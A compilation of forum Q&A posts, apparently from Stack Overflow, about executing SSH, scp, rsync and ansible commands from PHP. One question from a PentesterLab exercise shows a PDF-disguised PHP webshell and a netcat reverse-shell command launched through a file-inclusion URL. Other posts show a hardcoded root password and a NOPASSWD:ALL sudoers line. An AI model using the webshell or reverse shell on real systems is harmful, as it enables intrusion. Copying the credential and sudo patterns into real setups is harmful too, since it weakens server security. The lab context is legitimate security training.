I want to run a local shell script that have SSH commands on the server using PHP. And inside the script i am using ssh to run a command like ls -lart and save the result on a log file in the server, and then using scp to copy the remote file to my local host. Something like this:
/// my_local_shell.sh
#!/bin/bash
host=$1
user=$2
port=$3
ssh -p $port $user#$host 'ls -lart >> /home/remote/file.log'
scp -P $port $user#$host:/home/remote/file.log /home/local/file.log
If i run the script using the terminal user#local_host:~$ ./my_local_shell.sh everything works just fine. But if i use shell_exec() to execute the script using PHP like this:
/// index.php
$output = shell_exec("my_local_shell.sh 192.168.1.1 root 2222");
echo <pre>$output</pre>;
Nothing is printed on screen and the SSH commands inside the file are not executed.
I know I can use ssh2_shell(), but by using it I would have to send the commands inside the PHP, and it's not what i want.
I already gave the permissions needed to index.php and my_local_shell.sh
Any ideas how I can do this?
Apparently scp uses some sort of ncurses that you can't capture, so you could add the -v flag to your scp command in the shell script
scp -v -P $port $user#$host:/home/remote/file.log /home/local/file.log
or alternatively, since scp returns 0 on success you could write
scp -P $port $user#$host:/home/remote/file.log /home/local/file.log && echo Success
As for the PHP please check you have PHP opening and closing tags and correct your echo statement
echo "<pre>".$output."</pre>";
Related
I am trying to ssh to a remote server to check to see if a specific file exists.
I am able to ssh in the command line but whenever I try to with my script it does not return anything / I have to type "exit" and hit enter to get back to the command line.
Steps:
ssh root#website.com
cd ..
ls ATMEXTRACT
I put all of these commands into ouputs so they look like this:
$output = shell_exec("ssh root#website.com");
$ouput1 = shell_exec("cd ..");
$ouput2 = shell_exec("ls *ATMEXTRACT*");
echo($output2);
I am confused as to why this works directly in the command line but is failing in the script. Any help is much appreciated
Here's what you do interactively:
Run ssh root#website.com in the current shell
Input cd .. in ssh
Input ls *ATMEXTRACT* in ssh
Input exit in ssh, which now exits
Find yourself back in your original shell
Here's what you do in your script:
Run ssh root#website.com in a new shell and exit it
Run cd .. in a second shell and exit it
Run ls *ATMEXTRACT* in a third shell and exit it
You could try to open and interact with an ssh command, but you can also just save yourself the trouble and use ssh's command line feature for specifying the commands to run:
$output = shell_exec("ssh root#website.com 'cd .. && ls *ATMEXTRACT*'");
Be aware that this is likely to fail from a PHP website script because you need to set up an authentication mechanism. This true even if ssh root#website.com connects without a password when you manually log in to the web server and try it.
I would recommend you to use ssh2 module of PHP. This will help you to connect any remote server which is reachable through appropriate SSH PORT.
You will need to check, if few modules like OpenSSL and ssh2 are installed on your host server.
if not please check this https://ehikioya.com/install-ssh2-php/ and install above modules.
once these modules are installed and enabled.
follow this code.
$server="website.com";
$server_pwd="Password";
//creating connection using server credentials
$connection = ssh2_connect($server, 22);
//authenticating username and password
if(ssh2_auth_password($connection, 'root', $server_pwd)){
echo "connected"
}else{
echo "could not connect to server";
}
ssh2_exec($connection, "ls /FULL_PATH/ATMEXTRACT"); //run your command here
my ansible command won't run using shell_exec function in php but the other
commands like ls, pwd works just fine note that my php code is hosted on nginx web server
and i am logged in as a 'user' in both machines my local machine and my remote server which has this name 'dockerengine'
<%php
shell_exec("ansible dockerengine -m shell -a 'echo hello > /home/user/hello.txt'")
%>
when i execute the command ansible dockerengine ... (dockerengine is my remote server) in terminal it works perfectly
note also i configured ssh keys and sudoers file on my remote server to escalate privileges auto
//this code contained in a file with root priv hosted on nginx
<%php shell_exec("ansible dockerengine -m shell -a 'echo hello > /home/user/hello.txt'") %>
// this line is written in the sudoers file of my remote server (dockerengine)
user ALL=(ALL) NOPASSWD:ALL
// this line is written in the /etc/ansible/hosts file in my local machine
[docker]
dockerengine ansible_user=user
With PHP, I am trying to connect to a remote server and exec an rsync command :
$rsync_cmd = 'rsync -P -azv -e "ssh -p 1234" /dir/file.jpg root#remoteserver2:/dir/file.jpg';
exec('sudo ssh -tt root#remoteserver1 '.$rsync_cmd.' 2>&1', $output);
The remote connection is working fine but then when I am including my rsync command I got a port error "ssh: connect to host remoteserver2 port 22: Connection refused"
The correct port to use is 1234 and this command is working fine on the Terminal (shell) but php "exec" function dont want to take it ("ssh -p 1234"), any idea ?
Did you test it in Terminal by sshing into remoteserver1, and then executing the rsync command, or by executing the entire ssh-to-rsync command on one line? Because I'm pretty sure doing it in two steps will work, but one step won't. This is because when it's done as one step, the command string is parsed by the local shell (including doing quote and escape interpretation and removal) before it's passed over ssh to the remote shell (which then does another pass of quote and escape interpretation and removal). Those double-quotes in "ssh -p 1234" get parsed and removed by the local shell, so they don't have the intended effect of being parsed and applied by the remote shell.
If I'm right about the problem, the solution is pretty simple: escape the double-quotes. That way the local shell will parse and remove the escapes, and pass the double-quotes through unmolested so the remote shell can see and apply them:
$rsync_cmd = 'rsync -P -azv -e \"ssh -p 1234\" /dir/file.jpg root#remoteserver2:/dir/file.jpg';
exec('sudo ssh -tt root#remoteserver1 '.$rsync_cmd.' 2>&1', $output);
The Solution is pretty mush simple try skipping -P flag from the command.
$rsync_cmd = 'rsync -azv -e \"ssh -p 1234\" /dir/file.jpg root#remoteserver2:/dir/file.jpg';
exec('sudo ssh -tt root#remoteserver1 '.$rsync_cmd.' 2>&1', $output);
It will work fine with that -P flag it took default port for the rsync.
I am doing an exercise of PentesterLab,
I've got a webshell called 1.pdf, and it can be included in index.php as a PHP file. It contains code like this:
%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>
Now I want to create a reverse shell using nc with following commands, but it does not work properly:
index.php?page=uploads/1.pdf%00&cmd=/bin/nc 192.168.117.128 8001 -e /bin/bash
If I input commands at 192.168.117.128 then enter, nothing was output.
While, if I run the following commands directly in the VM(the target server), it connects to the attacker properly:
/bin/nc 192.168.117.128 8001 -e /bin/bash
Output of commands are properly echoed at 192.168.117.128
I wonder why netcat works in VM properly but does not work in webshell?
Anyone's help is appreciated, thanks.
I'm trying to set up a centralized server which is in charge of monitoring my other servers. This centralized server needs to be able to collect particular information/metrics about a specific server (such as df -h and service httpd status); but it also needs to be able to restart Apache if needed.
If it wasn't for the Apache restart, I could write a listening script to provide a means of giving the centralized server the data it needs without having to SSH in. But because I also want it to be able to restart Apache, it needs to be able to log in and initiate scripts through a combination of PHP and Bash.
At the moment, I'm using PHP's shell_exec to execute this (very simple) Bash script:
#!/bin/sh
ssh -i /path/to/keyFile.pem ec2-user#x.x.x.x;
I'm accessing the external server (which is an EC2 instance) through a private IP. If I launch this script, I can log in without any problem - the problem comes, however, when I then want to send back the output for commands like the ones I've listed above.
In a Bash script, how would I output a command like df -h after SSHing into another server? Is this possible?
There is a PECL extension for SSH.
Other than that you'll probably want to either use the &$output parameter of exec() to grab the output:
$output = array();
exec('bash myscript.sh', $output);
print_r($output);
Or use output redirection
$output = '/path/to/output.txt';
exec("bash myscript.sh > $output");
if( file_exists($output) && is_readable($output) ) {
$mydata = file_get_contents($output);
}
and, of coure, this all assumes your script looks like what jeroen has in his answer.
You could use:
ssh -i /path/to/keyFile.pem ec2-user#x.x.x.x 'df -h'
or for multiple commands:
ssh -i /path/to/keyFile.pem ec2-user#x.x.x.x 'ls -al ; df -h'
That works from the command line but I have not tried it via php's exec (nor on Amazon to be honest...).
If you're doing ssh I'd suggest phpseclib, a pure PHP SSH implementation. It's a ton more portable than the PECL SSH extension and more reliable too.